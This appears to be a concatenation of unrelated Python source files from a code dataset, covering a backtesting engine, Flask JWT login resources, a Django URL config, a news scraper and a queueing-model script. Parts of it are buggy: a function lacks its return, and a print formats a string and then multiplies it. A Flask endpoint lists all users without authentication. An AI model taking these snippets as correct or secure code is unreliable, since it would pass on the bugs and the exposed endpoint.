r'''\n2003-11/2003-11-06T13.46.08.jpeg\n2013-07/2013-07-04T19.15.41.adc8.jpeg\n2013-07/2013-07-04T19.15.41.da39.jpeg\n2013-07/2013-07-04T19.15.41.e5fa.jpeg\n2013-07/2013-07-04T19.16.25.jpeg\n2013-07/2013-07-05T15.13.56.jpeg\nh.png\n'''[1:].splitlines(False)\n\n_ls_rare_case = r'''\n2003-11/2003-11-06T13.46.08.jpeg\n2013-07/2013-07-04T19.15.41.adc8.00.jpeg\n2013-07/2013-07-04T19.15.41.adc8.01.jpeg\n2013-07/2013-07-04T19.15.41.e5fa.jpeg\n2013-07/2013-07-04T19.16.25.jpeg\n2013-07/2013-07-05T15.13.56.jpeg\nh.png\n'''[1:].splitlines(False)\n\nclass T(TestCase):\n def setUp(self):\n self.cwd = getcwd()\n prepare()\n pb.simulate_bug1 = False\n pb.simulate_bug2 = False\n pb.simulate_rare_case = False\n def tearDown(self):\n chdir(self.cwd)\n prepare()\n def test0normal(self):\n expected = _ls\n expected = expected, expected\n photobatch(pb.test_base)\n a = sorted(ls(pb.test_base))\n photobatch(pb.test_base)\n b = sorted(ls(pb.test_base))\n got = a, b\n self.assertEquals(expected, got)\n def test1bug1(self):\n pb.simulate_bug1 = True\n self.assertRaises(PhotoBatchBug1, photobatch, pb.test_base)\n def test2bug2(self):\n pb.simulate_bug2 = True\n self.assertRaises(PhotoBatchBug2, photobatch, pb.test_base)\n def test3rare_case(self):\n pb.simulate_rare_case = True\n expected = _ls_rare_case\n expected = expected, expected\n photobatch(pb.test_base)\n a = sorted(ls(pb.test_base))\n photobatch(pb.test_base)\n b = sorted(ls(pb.test_base))\n got = a, b\n self.assertEquals(expected, got)\n\ndef ls(dir):\n chdir(dir)\n for prefix, dirs, files in walk(curdir):\n for file in files:\n yield normpath(join(prefix, file))\n","sub_path":"last-dropbox/photo-batch/tests/a.py","file_name":"a.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"626695448","text":"from connecting_function import 
connecting_function\r\nfrom lxml import etree\r\nimport time\r\nimport datetime\r\n\r\ndef parsing_news_omitted():\r\n from urllib.request import urlopen # Library for urlopen\r\n from bs4 import BeautifulSoup # Library for html parser (scraper), lxml is also nice\r\n numbers = [\"zero\", \"one\", \"two\", \"three\", \"four\", \"five\", \"six\", \"seven\", \"eight\", \"nine\", \"ten\", \"eleven\",\r\n \"twelve\", \"thirteen\", \"fourteen\", \"fifteen\", \"sixteen\", \"seventeen\", \"eighteen\", \"nineteen\", \"twenty\",\r\n \"twentyone\", \"twentytwo\", \"twentythree\", \"twentyfour\", \"twentyfive\", \"twentysix\", \"twentyseven\",\r\n \"twentyeight\", \"twentynine\", \"thirty\", \"thirtyone\", \"thirtytwo\", \"thirtythree\", \"thirtyfour\",\r\n \"thirtyfive\", \"thirtysix\", \"thirtyseven\", \"thirtyeight\", \"thirtynine\", \"forty\", \"fortyone\", \"fortytwo\",\r\n \"fortythree\", \"fortyfour\", \"fortyfive\", \"fortysix\", \"fortyseven\", \"fortyeight\", \"fortynine\", \"fifty\",\r\n \"fiftyone\", \"fiftytwo\", \"fiftythree\", \"fiftyfour\", \"fiftyfive\", \"fiftysix\", \"fiftyseven\", \"fiftyeight\",\r\n \"fiftynine\", \"sixty\", \"sixtyone\", \"sixtytwo\", \"sixtythree\", \"sixtyfour\", \"sixtyfive\", \"sixtysix\",\r\n \"sixtyseven\", \"sixtyeight\", \"sixtynine\", \"seventy\", \"seventyone\", \"seventytwo\", \"seventythree\",\r\n \"seventyfour\", \"seventyfive\", \"seventysix\", \"seventyseven\", \"seventyeight\", \"seventynine\", \"eighty\",\r\n \"eightyone\", \"eightytwo\", \"eightythree\", \"eightyfour\", \"eightyfive\", \"eightysix\", \"eightyseven\",\r\n \"eightyeight\", \"eightynine\", \"ninety\", \"ninetyone\", \"ninetytwo\", \"ninetythree\", \"ninetyfour\",\r\n \"ninetyfive\", \"ninetysix\", \"ninetyseven\", \"ninetyeight\", \"ninetynine\",\r\n \"hundred\", ] # Array for numerating articles\r\n final_links = [] # Creating empty array for links\r\n while 1:\r\n temp_url_input = input(\"url: \")\r\n if temp_url_input == \".\":\r\n break\r\n else:\r\n final_links.append(temp_url_input)\r\n i = 0\r\n final_articles = [] # Creating empty array for articles\r\n for url_article in final_links: # Through loop searching for articles' text\r\n pre_source_article = urlopen(url_article).read().decode('utf-8', 'ignore') # Reading pages\r\n source_article = BeautifulSoup(pre_source_article, \"html.parser\") # Converting to BS type\r\n text_article = BeautifulSoup(str(source_article.find_all('div', class_=\"article__text text \")),\r\n \"html.parser\") # searching for articles' text\r\n final_articles.append('Article number ' + numbers[i] + ':\\n' + text_article.text) # putting it to array\r\n i += 1;\r\n print('.') # loading string\r\n return final_articles\r\n\r\nomitted_month = int(input(\"Please enter the number of omitted month: \"))\r\nomitted_day = int(input(\"Please enter the number of omitted day: \"))\r\ncurrent_year = int(datetime.datetime.now().strftime(\"%Y\"))\r\ncurrent_date = datetime.date(current_year, omitted_month, omitted_day)\r\n\r\n\r\na = connecting_function(parsing_news_omitted())\r\n\r\nroot = etree.Element(\"parsed\")\r\netree.tostring(root)\r\nsub_root = etree.Element(\"news_for_today\", date=current_date.strftime(\"%d\") + \".\" + current_date.strftime(\r\n \"%m\") + \".\" + current_date.strftime(\"%Y\"),\r\n time=time.strftime(\"%H:%M:%S\"))\r\nroot.append(sub_root)\r\n\r\nfor i in range(0, len(a)):\r\n etree.SubElement(sub_root, \"article\", number=str(i)).text = str(a[i])\r\n\r\nhandle = str(etree.tostring(root, encoding='utf-8', xml_declaration=False, 
pretty_print=False))\r\nhandle = handle.replace('b\\'', '')\r\nhandle = handle.replace('\\'', '')\r\nhandle = handle.replace(' ', '')\r\nhandle = handle.replace('\\\\', '')\r\nwith open(\"../news/\" + current_date.strftime(\"%B\") + \"/\" + current_date.strftime(\"%d\") + \"_\" + current_date.strftime(\r\n \"%m\") + \"_\" + current_date.strftime(\"%Y\") + \".xml\",\r\n \"w\") as text_file:\r\n print(handle, file=text_file)\r\n","sub_path":"some_staff/parsing_news_omitted.py","file_name":"parsing_news_omitted.py","file_ext":"py","file_size_in_byte":4007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"326318111","text":"from django.conf.urls import *\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns,static\nfrom blog.views import *\nfrom PSI import settings\n\nurlpatterns = patterns('',\n url(r'^$', index),\n url(r'^login', loginn),\n url(r'^auth', auth_view),\n url(r'^logout', logout_view),\n url(r'^loggedin', loggedin),\n url(r'^invalid', invalid_login),\n url(r'^register', register_user),\n url(r'^registration_success', register_success),\n url(r'^profile/$', profile),\n url(r'^new_post/$', 'blog.views.post_new', name='blog_new_post'),\n url(r'^new_category/$', 'blog.views.category_new', name='blog_new_category'),\n # url(r'^profile/(?P<author>[^\\.]+).html', 'blog.views.author_profile', name='view_profile_author'),\n url(r'^view/(?P<slug>[^\\.]+).html', view_post, name='view_blog_post'),\n url(r'^category/(?P<slug>[^\\.]+).html', view_category, name='view_blog_category'),\n\n\n\n)\n","sub_path":"PSI/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1183,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"313166454","text":"# -*- coding: utf-8 -*-\n# vim: set fileencoding=utf-8 :\n\n\"\"\"Personalized model fields types.\"\"\"\n\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom django.db import models\nfrom django.core import exceptions\nfrom django.utils.datastructures import SortedDict\n\nimport re\n\n_R_ARRAY = re.compile('^{(.*)}$')\n\nclass DOWArrayField(models.Field):\n \"\"\"Modelisation of a DOW type (Day Of Week).\n \n Database type: integer[]\n Python type: list\n \n Remark: Have been developed on a postgresql database. 
Compatibility with \n other database types has not been tested\n \n \"\"\"\n __metaclass__ = models.SubfieldBase\n\n DOWS = [0, 1, 2, 3, 4, 5, 6]\n\n def __init__(self, *args, **kwargs):\n super(DOWArrayField, self).__init__(*args, **kwargs)\n\n def is_dow(self, field_data, all_data):\n \"\"\"Validator.\n\n Check that:\n\n + each element of the list is an integer\n + each element of the list is on the list of authorized values\n\n \"\"\"\n for value in field_data:\n try:\n if int(value) not in self.DOWS:\n raise exceptions.ValidationError(_(\"\"\n \"%(day)d is not a valid day of week.\" % {'day':\n int(value)}))\n except ValueError:\n raise exceptions.ValidationError(_(\"\"\n \"This list must contain only integers.\"))\n\n def db_type(self):\n \"\"\"Return the column type (the DB one)\n \n \"\"\"\n return 'integer[]'\n\n def to_python(self, value):\n \"\"\"Convert the database returned value into a python type\n\n \"\"\"\n if isinstance(value, list):\n return value\n try:\n value_list = _R_ARRAY.match(value).group(1)\n except (AttributeError, TypeError):\n return []\n if not value_list:\n return []\n return value_list.split(',')\n\n def get_db_prep_value(self, value):\n \"\"\"reverse of the methode \"to_python\".\"\"\"\n # convert the unicode chars to ints\n value = [int(value) for value in value]\n self.is_dow(value, None)\n value.sort()\n return \"{%s}\" % ','.join([\"%d\" % v for v in value])\n\n","sub_path":"src/bv/client/utils/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"11178286","text":"class Solution:\r\n # @param A : integer\r\n # @return a list of list of integers\r\n def solve(self, A):\r\n if A==0:\r\n return []\r\n if A==1:\r\n ans=[[1]]\r\n elif A>=2:\r\n ans=[[1],[1,1]]\r\n for i in range(2,A):\r\n row=[1]\r\n j=0\r\n while j<len(ans[i-1])-1:\r\n row.append(ans[i-1][j]+ans[i-1][j+1])\r\n j+=1\r\n row.append(1)\r\n ans.append(row)\r\n return ans","sub_path":"Programming/Arrays/Simulation Array/Pascal Triangle.py","file_name":"Pascal Triangle.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"472682128","text":"\nimport datetime\nimport talib\nimport time\n\nimport pandas as pd\nimport numpy as np\n\nclass IntradayEventEngine:\n\n DEFAULT = dict(\n transaction_cost = 0.0,\n )\n\n def __init__(self, data):\n self.data = data\n self.portfolio = {}\n self.history = {}\n self.syms = self.data.liquidity.columns.tolist()\n self.syms_mapping = {self.syms[i]: i for i in range(len(self.syms))}\n\n def to_eod(self, reference):\n \"\"\" Function to calculate minutes to EOD \"\"\"\n output = reference['to_day_eod']\n if reference['is_broken_day']:\n if (reference['to_night_eod'] >= 0) and (reference['to_day_eod'] >= 0):\n output = reference['to_night_eod']\n else:\n output = reference['to_day_eod']\n return output\n\n def from_sod(self, reference):\n \"\"\" Function to calculate minutes from SOD \"\"\"\n output = reference['from_night_sod']\n if reference['is_broken_day']:\n if (reference['from_night_sod'] >= 0) and (reference['from_day_sod'] >= 0):\n output = reference['from_day_sod']\n else:\n output = reference['from_night_sod']\n\n def load_strategies(self, strategies):\n \"\"\" Load strategies \"\"\"\n self.strategies = strategies\n self.strategies_names = []\n cache_config = {}\n # request_cache\n for strategy in self.strategies:\n 
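            # Each strategy advertises the derived columns it needs through
            # request_cache(); merging the requests into one dict lets
            # cache_custom() below prepare them once for all strategies
            # instead of once per strategy.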
cache_config.update(strategy.request_cache())\n self.strategies_names += [strategy.name]\n self.data.cache_custom(cache_config)\n\n def update_holding(self, orders, snap):\n \"\"\" Function to update holding \"\"\"\n if self.execute:\n\n position_change = np.array(orders)\n new_position = self.portfolio['position'] + position_change\n # current_price = np.array([snap[sym]['open'] for sym in self.syms])\n\n # update pnl at beginning of bar\n self.update_snap(snap = snap, price = 'open')\n\n # # update cost\n # increase_position = (self.portfolio['position'] * position_change) >= 0\n # new_cost = self.portfolio['cost'] * self.portfolio['position'] + position_change * current_price\n # self.portfolio['cost'][increase_position] = new_cost[increase_position]\n # self.portfolio['cost'][new_position == 0] = 0\n\n # update position\n self.portfolio['position'] = new_position\n # self.portfolio['position'] = self.portfolio['position'] + position_change\n \n # update min/max price\n self.portfolio['max_price'][new_position == 0] = 0\n self.portfolio['min_price'][new_position == 0] = 1e+4\n \n # update transaction cost\n transaction_cost = np.abs(position_change).sum(axis = 1) * self.config['transaction_cost']\n self.portfolio['value'] = self.portfolio['value'] - transaction_cost\n\n # update new position\n self.update_snap(snap = snap, price = 'open')\n\n def update_snap(self, snap, price = 'open'):\n \"\"\" Function to update portfolio \"\"\"\n # current_price = np.array([snap[sym][price] for sym in self.syms])\n # position_return = self.portfolio['position'] * (current_price - self.portfolio['last_price'])\n # position_return[self.portfolio['last_price'] == 0] = 0\n # self.portfolio['value'] = self.portfolio['value'] + position_return.sum(axis = 1)\n # self.portfolio['last_price'] = (self.portfolio['position'] != 0).dot(np.diag(current_price))\n\n current_price = np.array([snap[sym][price] for sym in self.syms])\n position_return = self.portfolio['position'].dot(np.diag((current_price - self.portfolio['last_price'])))\n # position_return[self.portfolio['last_price'] == 0] = 0\n self.portfolio['value'] = self.portfolio['value'] + position_return.sum(axis = 1)\n self.portfolio['last_price'] = current_price\n\n self.portfolio['max_price'] = self.portfolio['max_price'].clip(min = current_price)\n self.portfolio['min_price'] = self.portfolio['min_price'].clip(max = current_price)\n\n # self.\n def record(self, dt):\n \"\"\" Function to record portfolio status \"\"\"\n self.history[self.portfolio['index']] = {\n 'value': self.portfolio['value'],\n 'position': self.portfolio['position'],\n }\n\n def run(self, start_date, end_date, config = None):\n \"\"\" Function to run backtest \"\"\"\n\n print('Running backtest for {n} strategies'.format(\n n = len(self.strategies)\n ))\n self.config = self.DEFAULT.copy()\n self.config.update(config if config is not None else {})\n\n start_date = start_date.strftime('%Y-%m-%d')\n end_date = end_date.strftime('%Y-%m-%d')\n\n dt_index = self.data.dt_profile.index[self.data.dt_profile['date'].between(start_date, end_date)]\n start_index = self.data.dt.get_loc(dt_index.min())\n end_index = self.data.dt.get_loc(dt_index.max())\n\n _, reference = self.data.snap_cache(index = start_index)\n liquidity = self.data.liquidity.loc[reference['date']].nlargest(2)\n self.major = liquidity.index[0]\n self.minor = liquidity.index[1]\n self.orders_template = [[0] * len(self.syms)] * len(self.strategies_names)\n self.orders = self.orders_template.copy()\n self.execute = False\n 
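        # Wall-clock accumulators (seconds) used to profile each stage of the
        # event loop; the __main__ block at the bottom of the file prints them.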
self.time = {\n 'snap': 0,\n 'execute_orders': 0,\n 'strategies': 0,\n 'update_snap': 0,\n 'record': 0,\n 't1': 0,\n }\n self.portfolio = {\n 'index' : None,\n 'value' : np.zeros((len(self.strategies_names))),\n 'position' : np.zeros((len(self.strategies_names), len(self.syms))),\n 'last_price' : np.zeros((len(self.syms))),\n 'max_price' : np.zeros((len(self.strategies_names), len(self.syms))),\n 'min_price' : np.zeros((len(self.strategies_names), len(self.syms))),\n }\n # run thru minute bar\n for index in range(start_index, end_index + 1):\n self._next(index)\n \n def _next(self, index):\n \"\"\" Function to move to next time stamp \"\"\"\n # snap cache data\n t = time.time()\n snap, reference = self.data.snap_cache(index = index)\n self.time['snap'] += time.time() - t\n self.portfolio['index'] = index\n if reference['is_night_sod']:\n self.orders = {} \n self.sod = index\n liquidity = self.data.liquidity.loc[reference['date']].nlargest(2)\n self.major = liquidity.index[0]\n self.minor = liquidity.index[1]\n\n \n\n # execute orders at the beginning of bar\n t = time.time()\n self.update_holding(self.orders, snap)\n self.orders = self.orders_template.copy()\n self.execute = False\n self.time['execute_orders'] += time.time() - t\n\n # update portfolio status at the end of bar\n t = time.time()\n self.update_snap(snap = snap, price = 'close')\n self.time['update_snap'] += time.time() - t\n\n # record portfolio status\n t = time.time()\n self.record(index)\n self.time['record'] += time.time() - t\n\n # generate new orders at the end of this bar\n if not reference['is_day_eod']:\n snap_major = snap[self.major]\n close = snap_major.get('close')\n to_eod = self.to_eod(reference)\n from_sod = self.from_sod(reference)\n position_data = self.portfolio['position'][:, self.syms.index(self.major)]\n position_mapping = [0.0] * len(self.syms)\n position_mapping[self.syms_mapping[self.major]] = 1.0\n # price_change = (self.portfolio['last_price'] - self.portfolio['cost'])[:, self.syms.index(self.major)]\n\n drawdown = close - self.portfolio['max_price'][:, self.syms.index(self.major)]\n drawdown_short = self.portfolio['min_price'][:, self.syms.index(self.major)] - close\n drawdown[position_data < 0] = drawdown_short[position_data < 0]\n # print(position_data)\n # print(self.portfolio['max_price'][:, self.syms.index(self.major)])\n # print(self.portfolio['min_price'][:, self.syms.index(self.major)])\n # print(close)\n # print(drawdown)\n # print('===========================')\n t = time.time()\n for i, strategy in enumerate(self.strategies):\n position_change = strategy.next_snap(\n close = close,\n drawdown = drawdown[i],\n position = position_data[i],\n snap_major = snap_major,\n # snap_minor = snap_minor,\n # reference = reference,\n to_eod = to_eod\n # from_sod = from_sod\n )\n if position_change != 0:\n self.orders[i] = [x * position_change for x in position_mapping]\n self.execute = True\n self.time['strategies'] += time.time() - t\n\n def get_history(self):\n \"\"\" Function to aggregate history data \"\"\"\n wealth = pd.DataFrame.from_dict({k: v['value'] for k, v in self.history.items()}, orient = 'index', columns = self.strategies_names)\n wealth.index = self.data.dt[wealth.index]\n position = pd.DataFrame.from_dict({k: v['position'].sum(axis = 1) for k, v in self.history.items()}, orient = 'index', columns = self.strategies_names)\n position.index = self.data.dt[position.index]\n output = dict(\n wealth = wealth,\n position = position,\n )\n return output\n\n\n\nif __name__ == \"__main__\":\n\n 
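    # Smoke test: fit three SMA strategies (fast windows 3, 5 and 8 against a
    # 21-bar slow window) on one month of RB futures minute bars, then print
    # where the engine spends its time.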
import time\n from data.process_data import FuturesData\n from strategy import SMA, RSI\n # from backtest import IntradayEventEngine\n\n START_DATE = datetime.date(2019, 6, 1)\n END_DATE = datetime.date(2019, 6, 30)\n\n # get data\n fd = FuturesData(\n sym = 'RB',\n start_date = START_DATE,\n end_date = END_DATE, \n )\n\n strategies = [SMA(\n n_fast = f, \n n_slow = 21, \n atr_n = 21,\n atr_scale = 3,\n interval = 5, \n shift = 0) \n for f in [3, 5, 8]]\n iee = IntradayEventEngine(fd)\n iee.load_strategies(strategies)\n t = time.time()\n iee.run(\n start_date = START_DATE, \n end_date = END_DATE,\n config = {'transaction_cost': 0.25}\n )\n print('Running Time: {:.2f}'.format(time.time() - t))\n print('Snap Time: {:.2f}'.format(iee.time['snap']))\n print('Execution Time: {:.2f}'.format(iee.time['execute_orders']))\n print('Strategies Time: {:.2f}'.format(iee.time['strategies']))\n print('Update Snap Time: {:.2f}'.format(iee.time['update_snap']))\n print('Record Time: {:.2f}'.format(iee.time['record']))","sub_path":"legacy/backtest.py","file_name":"backtest.py","file_ext":"py","file_size_in_byte":11116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"441381251","text":"from flask import request, abort\nfrom flask_restful import Resource\nfrom flask_jwt_extended import (create_access_token,\n create_refresh_token, jwt_required, jwt_refresh_token_required,\n get_jwt_identity, get_raw_jwt)\nfrom marshmallow import ValidationError\n\nfrom . import person_blueprint\nfrom project.model import PersonModel, PersonSchema\n\n# /person/insert\nclass InsertPerson(Resource):\n def post(self):\n data = GetPersonSchema()\n\n if PersonModel.find_by_email(data['email']):\n return {'message': 'Person {} already exists'.format(data['email'])}\n\n new_person = PersonModel(\n email = data['email'],\n plaintext_password = data['password']\n )\n\n new_person.save_to_db()\n access_token = create_access_token(identity=data['email'])\n refresh_token = create_refresh_token(identity=data['email'])\n return {\n 'message': 'Person {} was created'.format(data['email']),\n 'access_token': access_token,\n 'refresh_token': refresh_token\n }\n\n\n# /login\nclass PersonLogin(Resource):\n def post(self):\n data = GetPersonSchema()\n \n current_person = PersonModel.find_by_email(data['email'])\n\n if not current_person:\n return {'message': 'Person {} doesn\\'t exist'.format(data['email'])}\n\n if PersonModel.verify_hash(current_person.s_password, data['password']):\n access_token = create_access_token(identity=data['email'])\n refresh_token = create_refresh_token(identity=data['email'])\n return {\n 'message': 'Logged in as {}'.format(data['email']),\n 'access_token': access_token,\n 'refresh_token': refresh_token\n }\n else:\n return {'message': 'Wrong credentials'}\n\n# /logout/access\nclass PersonLogoutAccess(Resource):\n def post(self):\n return {'message': 'Person logout'}\n \n# /logout/refresh\nclass PersonLogoutRefresh(Resource):\n def post(self):\n return {'message': 'Person logout'}\n \n# /person/token/refresh\nclass TokenRefresh(Resource):\n @jwt_refresh_token_required\n def post(self):\n current_person = get_jwt_identity()\n access_token = create_access_token(identity=current_person)\n return {\n 'message': 'Successfully refreshed access_token',\n 'access_token': access_token\n }\n \n# /people\nclass AllPeople(Resource):\n def get(self):\n return PersonModel.return_all()\n\n def delete(self):\n #removing for now\n #return PersonModel.delete_all()\n return 
{'message': 'Not implemented'}\n \n# /secret\nclass SecretResource(Resource):\n @jwt_required\n def get(self):\n return {\n 'answer': 42\n }\n\n##############################################\n### FUNCTIONS\n##############################################\n\ndef GetPersonSchema():\n schema = PersonSchema()\n \n if not request.json:\n abort(400, \"Expected input but did not receive any\")\n\n try:\n data = schema.load(request.json)\n\n # if some weird stuff or poorly formatted stuff is passed in\n except ValidationError as err:\n abort(400, err.messages)\n\n return data\n","sub_path":"project/person/resource.py","file_name":"resource.py","file_ext":"py","file_size_in_byte":3264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"454507902","text":"import os\nimport sys\nimport json\nimport copy\nimport re\nimport subprocess\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom functools import reduce\n\n\ntest_no = 1\n\n\n\n# test = {\"folder\":\"middleware_1\", \"title\":\"Baseline with one middleware\", \"instances\":6, \"from\":\"memtier\"}\n# test = {\"folder\":\"middleware_1\", \"title\":\"Baseline with one middleware\", \"instances\":6, \"from\":\"middleware\"}\n# test = {\"folder\":\"middleware_2\", \"title\":\"Baseline with two middleware\", \"instances\":6, \"from\":\"memtier\"}\n# test = {\"folder\":\"middleware_2\", \"title\":\"Baseline with two middleware\", \"instances\":6, \"from\":\"middleware\"}\n\n# test = {\"folder\":\"writes_1\", \"title\":\"Write-only load\", \"instances\":6, \"from\":\"memtier\"}\ntest = {\"folder\":\"writes_1\", \"title\":\"Write-only load\", \"instances\":6, \"from\":\"middleware\"}\n\n# test = {\"folder\":\"gets_1\", \"title\":\"Read-only load, non sharded\", \"instances\":1, \"from\":\"memtier\"}\n# test = {\"folder\":\"gets_1\", \"title\":\"Read-only load, non sharded\", \"instances\":1, \"from\":\"middleware\"}\n# test = {\"folder\":\"gets_2\", \"title\":\"Read-only load, sharded\", \"instances\":1, \"from\":\"memtier\"}\n# test = {\"folder\":\"gets_2\", \"title\":\"Read-only load, sharded\", \"instances\":1, \"from\":\"middleware\"}\n\n# test = {\"folder\":\"twok\", \"title\":\"Read-only load, sharded\", \"instances\":1, \"from\":\"memtier\"}\n\n# basefolder=\"./archivio/scp_logs/middleware_2_set_real/scp_logs/\"+test['folder']\n# basefolder=\"./archivio/scp_logs/middleware_2_get_real/scp_logs/\"+test['folder']\n# basefolder=\"./archivio/scp_logs/middleware_2/2018-11-15_12:34:26/\"+test['folder']\n\nbasefolder=\"./archivio/scp_logs/\"+test['folder']+\"_real/scp_logs/\"+test['folder']\n# basefolder=\"./scp_logs/\"+test['folder']\n\nmemtier_files = subprocess.run(\"find . 
-wholename '\"+basefolder+\"/*_*/*.log'\", shell=True, stdout=subprocess.PIPE).stdout.decode('ascii')\ntest_time = json.load(open(memtier_files.split()[0]))['configuration']['test_time']\nprint(\"\\x1b[31;1mTest time:\", test_time, \"\\x1b[0m\")\n\ndata = {}\nkeywords = []\nworkers = []\n# keywords2 = ['throughput', 'resp_time']\nkeywords2 = ['throughput', 'resp_time', 'queue_time', 'queue_size', 'waiting']\n# keywords2 = ['throughput', 'resp_time', 'waiting']\n\n\nfor client in os.listdir(basefolder):\n    if test['from'] == 'middleware' and \"_\" not in client: # it's a middleware\n        for log in os.listdir(os.path.join(basefolder, client)):\n            print(log)\n            req_type = 'set' if 'set' in log else 'get'\n            numbers = [int(s) for s in re.split(\"[^0-9]\", log) if s.isdigit()]\n            no_clients = numbers[0]\n            rep = numbers[1]\n            work = numbers[2] if len(numbers) > 2 else 0\n            if req_type not in data:\n                data[req_type] = {}\n            if req_type not in keywords:\n                keywords += [req_type]\n            if no_clients not in data[req_type]:\n                data[req_type][no_clients] = {}\n            if work not in data[req_type][no_clients]:\n                data[req_type][no_clients][work] = {}\n            if work not in workers:\n                workers += [work]\n            if rep not in data[req_type][no_clients][work]:\n                # data[req_type][no_clients][work][rep] = {\"throughput\":[], \"latency\":[]}\n                data[req_type][no_clients][work][rep] = dict((k, []) for k in keywords2)\n\n            no_lines = 0\n            with open(os.path.join(os.path.join(basefolder, client, log)), \"r\") as mylog:\n                for line in mylog.readlines():\n                    no_lines += 1\n            # if (no_clients == 32) and (work == 64): print(log, float(no_lines),float(work))\n            tput = []\n            with open(os.path.join(os.path.join(basefolder, client, log)), \"r\") as mylog:\n                for line in mylog.readlines():\n                    if len(line) < 10: continue\n                    d = dict((e1[0], e1[1]) for e1 in [a.split(\"=\") for a in line.split(\",\")])\n                    # data[req_type][no_clients][work][rep]['latency'] += [float(d['resp_time'])]\n                    for k in keywords2:\n                        if k == 'throughput':\n                            data[req_type][no_clients][work][rep]['throughput'] += [(float(d['gets']) + float(d['sets']))/test_time]\n                        else:\n                            data[req_type][no_clients][work][rep][k] += [float(d[k])]\n    if test_no == 2:\n        break\n\n# print(data)\n\nx = []\ny = dict((e1,dict((w, dict((e2, []) for e2 in keywords2)) for w in workers)) for e1 in keywords)\ne = dict((e1,dict((w, dict((e2, []) for e2 in keywords2)) for w in workers)) for e1 in keywords)\n\nmu_dict = {}\n\nfor no_clients in sorted(data[keywords[0]]):\n    x += [no_clients*test[\"instances\"]]\n    for req_type in keywords:\n        for work in sorted(workers):\n            t_reps = [np.sum(data[req_type][no_clients][work][rep]['throughput']) for rep in data[req_type][no_clients][work]]\n            mu_dict[work] = max(t_reps)\n            y[req_type][work]['throughput'] += [np.mean(t_reps)]\n            e[req_type][work]['throughput'] += [np.std(t_reps)]\n\n            for k in keywords2[1:]:\n                if k == 'throughput':\n                    reps = [np.sum(data[req_type][no_clients][work][rep][k]) for rep in data[req_type][no_clients][work]]\n                else:\n                    reps = [np.mean(data[req_type][no_clients][work][rep][k]) for rep in data[req_type][no_clients][work]]\n                y[req_type][work][k] += [np.mean(reps)]\n                e[req_type][work][k] += [np.std(reps)]\n\nfor work in sorted(workers):\n    mu = mu_dict[work]\n    la = y['set'][work]['throughput']\n    ro = [a/mu for a in la]\n    print(mu, ro)\n    mu /= 1000.0\n\n\n\n    print(\"********************* \",work, \" *********************\")\n\n    print()\n    print(\"%20s\" % \"Clients\", end=' ')\n    for n in [6,12,24,48,96,192]:\n        print(\"%10d\" % n, end=' ')\n    print()\n    print()\n\n    print(\"%20s\" % 
\"$\\lambda$\", end=' ')\n for n in range(len(y['set'][work]['resp_time'])):\n print(\"%10.2f\" % la[n], end=' ')\n print()\n print(\"%20s\" % \"µ\", end=' ')\n for n in range(len(y['set'][work]['resp_time'])):\n print(\"%10.0f\" % mu*1000, end=' ')\n print()\n print(\"%20s\" % \"$\\\\rho$\", end=' ')\n for n in range(len(y['set'][work]['resp_time'])):\n print(\"%10.3f\" % ro[n], end=' ')\n print()\n print()\n\n print(\"%20s\" % \"Response time\", end=' ')\n for n in range(len(y['set'][work]['resp_time'])):\n print(\"%10.2f\" % y['set'][work]['resp_time'][n], end=' ')\n print()\n print(\"%20s\" % \"$E[r]$\", end=' ')\n for n in range(len(y['set'][work]['resp_time'])):\n print(\"%10.2f\" % ((1.0/float(mu)) / (1.0 - float(ro[n]))), end=' ')\n print()\n print()\n\n print(\"%20s\" % \"Queue size\", end=' ')\n for n in range(len(y['set'][work]['queue_size'])):\n print(\"%10.2f\" % y['set'][work]['queue_size'][n], end=' ')\n print()\n print(\"%20s\" % \"$E[n_q]$\", end=' ')\n for n in range(len(y['set'][work]['resp_time'])):\n print(\"%10.2f\" % (ro[n]*ro[n] / (1.0 - float(ro[n]))), end=' ')\n print()\n print()\n\n print(\"%20s\" % \"Queue time\", end=' ')\n for n in range(len(y['set'][work]['queue_time'])):\n print(\"%10.2f\" % y['set'][work]['queue_time'][n], end=' ')\n print()\n print(\"%20s\" % \"$E[w]$\", end=' ')\n for n in range(len(y['set'][work]['resp_time'])):\n print(\"%10.2f\" % (ro[n]*(1.0/float(mu)) / (1.0 - float(ro[n]))), end=' ')\n print()\n print()\n\n\nprint(y['set'][32]['throughput'])\n\n\n# c=json.dumps(data, indent=2)\n# print(c.replace(\",\",\".\"))\n\n# print(json.dumps(data, indent=2))\n# print(data)\n\n# subplot = 221\n# sns.set(style='ticks', palette='Set2')\n\n# workers = sorted(workers)\n\n","sub_path":"mm1.py","file_name":"mm1.py","file_ext":"py","file_size_in_byte":7673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"541607725","text":"#!/usr/bin/env python\n# Copyright (c) 2013 Hewlett-Packard Development Company, L.P.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# THIS FILE IS MANAGED BY THE GLOBAL REQUIREMENTS REPO - DO NOT EDIT\nimport os\n\nimport profimp\n\ntry:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\n# In python 